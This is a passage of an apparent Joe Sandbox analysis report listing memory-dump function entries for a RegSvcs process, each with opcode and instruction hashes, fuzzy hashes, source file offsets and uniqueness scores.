                                                                • Opcode ID: d27eb6108543f2051a22c0d30ad8bd24dc892a5fad9083cf4a5c8cb6a1178be9
                                                                • Instruction ID: 0a3335bf8402cc6246971455b999cdf920f50287eabbb545c0c83cb7ba3f3221
                                                                • Opcode Fuzzy Hash: d27eb6108543f2051a22c0d30ad8bd24dc892a5fad9083cf4a5c8cb6a1178be9
                                                                • Instruction Fuzzy Hash: F8417475F00605DFEF60CEA9D880ABFF7F5EB45310F10492AE216D7695D730A8458BA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6dce4df31374ab0689a6571565c0c17ff43c645ff991bbbbd24b630c10e9efd9
                                                                • Instruction ID: fa6d2699c7dd839b7988dd0afe9fab5fc1e9cb58c8cb0c75381e987f90f24d09
                                                                • Opcode Fuzzy Hash: 6dce4df31374ab0689a6571565c0c17ff43c645ff991bbbbd24b630c10e9efd9
                                                                • Instruction Fuzzy Hash: 2A314F34E10205DFEB59CBA4D9546AEB7F6AF89314F10C529E806A7790DB70AC46CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 66864c3da0faa4587d552a354ae919c1836a14f97f8884474e6dcc49b46fbf3e
                                                                • Instruction ID: d2f3e6777d0c8141f2e87282631acc907cbce28958d5ce047735af2d0a84d160
                                                                • Opcode Fuzzy Hash: 66864c3da0faa4587d552a354ae919c1836a14f97f8884474e6dcc49b46fbf3e
                                                                • Instruction Fuzzy Hash: 40313934E10605DBEB55CFA4D5946AEB7F6AF89300F10C529E80AAB390DB70A846CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f63b18d03bf0fd8c862bea3fa247bd44755255128af28007a8e61e1777aef688
                                                                • Instruction ID: 4bc316ee5265dfa4cf091d10fe0c534fbea1da4d1047d92adab71d51f351947e
                                                                • Opcode Fuzzy Hash: f63b18d03bf0fd8c862bea3fa247bd44755255128af28007a8e61e1777aef688
                                                                • Instruction Fuzzy Hash: CA219171F00215DFDB04DF78ED90AAEBBF5AB88614F10806AE904E7390E631E941CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0941ab49b3467a88ab46243bdbf8ef2bf1ff601a6b6236e71dbf50739c04871e
                                                                • Instruction ID: 72198cf2d152a02d04c3357da138ad611e5c14961fc24074b2ed94f1aeb35c0b
                                                                • Opcode Fuzzy Hash: 0941ab49b3467a88ab46243bdbf8ef2bf1ff601a6b6236e71dbf50739c04871e
                                                                • Instruction Fuzzy Hash: F121C530B102058FEB60DAB8E96077EB3D6DF86714F104436E54ECB3C9EA21DC0287A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4134156229.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c6d000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81ee750addc914871eea50d7ac61303f4d26c99398fec40faa3b358d58f35e7d
                                                                • Instruction ID: 0aa0ff39e7149650713de122af585d43e52e9ebcd1d8c371670c13e153378296
                                                                • Opcode Fuzzy Hash: 81ee750addc914871eea50d7ac61303f4d26c99398fec40faa3b358d58f35e7d
                                                                • Instruction Fuzzy Hash: 63314B7550D3C49FCB13CF24D990715BF71AB56214F29C5EBD9898F2A3C23A980ACB62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3ae45d54e9dc61c4175b3b32f58de732604c552433644c125d6952619781d070
                                                                • Instruction ID: b6262a09c734bb7dfcee6b595703c531923c25d57bff3097557c9c7d0b4403fe
                                                                • Opcode Fuzzy Hash: 3ae45d54e9dc61c4175b3b32f58de732604c552433644c125d6952619781d070
                                                                • Instruction Fuzzy Hash: 20219175F01215DFEB44DF79DA80AAEB7F5EB88600F108026E905E7390E730E9018B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 098ea944f16eca0075c9755814b41a816e11821a52c38dddd3bdf8bd2fc5ec3e
                                                                • Instruction ID: 3940093c7779e7cac15381ea57235afc38eca6f6be6483c9cacd597445dcdf81
                                                                • Opcode Fuzzy Hash: 098ea944f16eca0075c9755814b41a816e11821a52c38dddd3bdf8bd2fc5ec3e
                                                                • Instruction Fuzzy Hash: 7421D130B10214DFEF94DB78E5546AEBBF6EBC8324F148529D405EB382DB319C428BA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4134156229.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c6d000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 498f81c25890436d13cf89c9849d605a10c545eba4f37c59d67f67d9b10261bf
                                                                • Instruction ID: bd759e991551af557a7997049cc7f0090a5b5ceba27343ee731f05717829c024
                                                                • Opcode Fuzzy Hash: 498f81c25890436d13cf89c9849d605a10c545eba4f37c59d67f67d9b10261bf
                                                                • Instruction Fuzzy Hash: DD210471A04204DFCB24DF14DAC0B26BBA5FB84314F34C56DD80A4B296C77BD847CA62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 06df99f46912d9736c3afa8fac87290c383b09833c8be68d40ac66377f4f035b
                                                                • Instruction ID: 28e4ff750afc648b969e86609f43607d61cd4bae619e6fb7c8e67a6788f56488
                                                                • Opcode Fuzzy Hash: 06df99f46912d9736c3afa8fac87290c383b09833c8be68d40ac66377f4f035b
                                                                • Instruction Fuzzy Hash: 06018436B10015AFEB5896A8EC516EF77FED7C4614F50403AE50AD7284DE61A80287E2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6ba7f7c4a5959c96e298b6bd556e2598c8b1000e441083e90eb1142fd91388ff
                                                                • Instruction ID: be8cf4099bd46ef5333785aed7ad8fa30ee7e3f04b5af646620df10a1b01c45f
                                                                • Opcode Fuzzy Hash: 6ba7f7c4a5959c96e298b6bd556e2598c8b1000e441083e90eb1142fd91388ff
                                                                • Instruction Fuzzy Hash: AE116131F101259FEF58D678D8546AE73FAABC8614B11853AD50AE7384DE34EC068BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e1cadd32dcb8bf218ab8542fed67d481609a3287bf08b33b3b642bae819df6d0
                                                                • Instruction ID: 7b5f508f76b261f864e6034cbd84b07b1a567e69eed8216d9690f1b23b684c49
                                                                • Opcode Fuzzy Hash: e1cadd32dcb8bf218ab8542fed67d481609a3287bf08b33b3b642bae819df6d0
                                                                • Instruction Fuzzy Hash: 9201B130B001506FEB99956CA45473FABD7DBCA324F24843AF10ECB395E965EC4243B6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 442976cff2e37cc5f16518f831e7337d5da65c2089953aa3b1ae8d40eaebca80
                                                                • Instruction ID: 02aa32f4b35c283f26e6af0436b68bc09fdf72a7dc8918a0dc09e187684544f5
                                                                • Opcode Fuzzy Hash: 442976cff2e37cc5f16518f831e7337d5da65c2089953aa3b1ae8d40eaebca80
                                                                • Instruction Fuzzy Hash: 8721EFB5901259EFCB10CF9AD884BCEFBF8BB48314F10816AE918A7240C375A950CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1ddec319a5d38c086aea839454c4c0ceaa13a724ff90299fe08dd56c5c2df1b8
                                                                • Instruction ID: 74f3b886dc549de49df70677e803bb3aba0c56f10f4afdea6cecd39c1cea38f2
                                                                • Opcode Fuzzy Hash: 1ddec319a5d38c086aea839454c4c0ceaa13a724ff90299fe08dd56c5c2df1b8
                                                                • Instruction Fuzzy Hash: 4B11B3B5D01259DFCB10DF9AD884ADEFBF8FB48314F10812AE518A7250C374A954CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fd37d82b4968f19d91550cb0764f3ba26f79629229697f7031faf5b3784813ff
                                                                • Instruction ID: 25b58cb82a287e78309473e87919bc3dd63ed5cfb5c4b2c530e954efc1c7bf79
                                                                • Opcode Fuzzy Hash: fd37d82b4968f19d91550cb0764f3ba26f79629229697f7031faf5b3784813ff
                                                                • Instruction Fuzzy Hash: 94018131B001145BEB68956DA550B2FB6DBDBCA724F20843AF10EC7395ED65EC4243F5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 45f7d31a1f033c5c5e35fdf7e130a6b66d834794b5d8e73766dbb7b4bb8c729e
                                                                • Instruction ID: d504f2d1bd3c67276ea34a7d24689a005bb87d365c73fdc09d26a226955ddb65
                                                                • Opcode Fuzzy Hash: 45f7d31a1f033c5c5e35fdf7e130a6b66d834794b5d8e73766dbb7b4bb8c729e
                                                                • Instruction Fuzzy Hash: DE018630B101144BEB60E67CE56072AB3DADB89714F508429E50EC7388D921DC0287A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 80c142a795ad3d04c22ff4c3540e2ba91225fe08d0738d659f480b760c1fc620
                                                                • Instruction ID: 5328a028b83e800be7ccfaf5c139b27c5f6f2619796e61a6778136591d8da872
                                                                • Opcode Fuzzy Hash: 80c142a795ad3d04c22ff4c3540e2ba91225fe08d0738d659f480b760c1fc620
                                                                • Instruction Fuzzy Hash: 3AE09B71D19248DBEB10DA70890566A7BACD702204F2084E6E504CB183F576CD4583B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-2222239885
                                                                • Opcode ID: 1419c30652f1430190e5525e8b00a42a8cd0fb3488a4eff6697ef5249ebdb332
                                                                • Instruction ID: 0dccbceb3038766a0ba4a5c8f6b2f5dd019036977887f49a192ac9fe3d5370d3
                                                                • Opcode Fuzzy Hash: 1419c30652f1430190e5525e8b00a42a8cd0fb3488a4eff6697ef5249ebdb332
                                                                • Instruction Fuzzy Hash: 57124C30E00219CFDB68DF65C954AADB7F2BF88704F208969D409AB3A5DB319D85CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-3823777903
                                                                • Opcode ID: ea16795b20dbcf85ae36d8a75e0aee6be613daa564ec3aac1b7a68725305c7d3
                                                                • Instruction ID: e5d72721d85d8009dc483e7796dd7419f0b613148030db06bdd96a65fd8c62b5
                                                                • Opcode Fuzzy Hash: ea16795b20dbcf85ae36d8a75e0aee6be613daa564ec3aac1b7a68725305c7d3
                                                                • Instruction Fuzzy Hash: 0E918130E10209DFEB68DF64DA54B6EB7F2BF84304F208829E4019B3D5DB759945CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-390881366
                                                                • Opcode ID: 6731159d4e94f2ca4a0459f38a62ac2762afc6a6f656f95cdb805e5df2c908a4
                                                                • Instruction ID: 3c541a82b498e672a04345e8dad804749856ed0216b44d31267538910beeac50
                                                                • Opcode Fuzzy Hash: 6731159d4e94f2ca4a0459f38a62ac2762afc6a6f656f95cdb805e5df2c908a4
                                                                • Instruction Fuzzy Hash: A2F14F34A00308CFDB59EF64D654A6EBBF2BF84305F108529E4059B7AADB35DC86CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q
                                                                • API String ID: 0-2125118731
                                                                • Opcode ID: e4d39e497331d117f4cdd5aaa4fdd4b0b4506c1c7e274f9568e27fd81f999e80
                                                                • Instruction ID: f670511c851fbf5353e34a628a6ace75b09276eda71cc13072fd8fc1cac1f199
                                                                • Opcode Fuzzy Hash: e4d39e497331d117f4cdd5aaa4fdd4b0b4506c1c7e274f9568e27fd81f999e80
                                                                • Instruction Fuzzy Hash: 80B16C30A00208CFEB54EB68D99466EB7F2EF84705F248829E405AB795DF75DD86CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$LR^q$$^q$$^q
                                                                • API String ID: 0-2454687669
                                                                • Opcode ID: b7aa7a6013fb99ba1aa8732c857acf329d98f2d5079586dc150cd15319c775c6
                                                                • Instruction ID: 2bded4f4137f473800a3ce44a0c61bbb3b00e1804093fc6767f15ceef82165e5
                                                                • Opcode Fuzzy Hash: b7aa7a6013fb99ba1aa8732c857acf329d98f2d5079586dc150cd15319c775c6
                                                                • Instruction Fuzzy Hash: 8651D530B00205CFEB54DB28DA40A6EB7E6FF84704F108569E5059F3A5DB31ED45CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%